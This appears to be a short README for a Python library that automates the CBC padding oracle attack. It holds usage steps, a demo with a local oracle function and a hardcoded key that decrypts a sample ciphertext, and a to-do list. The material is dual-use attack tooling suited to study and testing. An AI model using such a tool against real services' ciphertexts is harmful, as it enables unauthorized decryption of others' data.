A python helper class for decrypting CBC encrypted ciphertexts using the padding oracle attack
- Implement a function that queries the oracle.
- Import pypoa's OracleAttack class.
- Instantiate OracleAttack class with the oracle function
- Call
attack.execute(ciphertext)on the ciphertext to leak it.
import decrypt
from decrypt import OracleAttack
# Define an oracle function that takes in a ciphertext and queries the oracle whether the padding is valid.
def localOracle(cipherText: bytearray):
key = b"Sixteen byte key" # Secret
iv = cipherText[:AES.block_size]
ct = cipherText[AES.block_size:]
try:
decrypt(ct, iv, key) # Query the oracle
return True
except:
return False
data = b"secret" # Secret
key = b"Sixteen byte key" #Secret
iv = b"/kQ\x0bDZ\xc6F\xb2\xc4\x9c\xca\x8c\'!]"
cipherText = b'VS&\xcb\xa7\xa5<\x14d\x00j\xe6\xb5\xba\xad\x08'
ct = iv+cipherText
attack = OracleAttack(localOracle)
decrypted = attack.execute(iv+cipherText)- Support different block sizes
- Automatic detection of block size
- Cleanup code.
- Port tests to proper unit test framework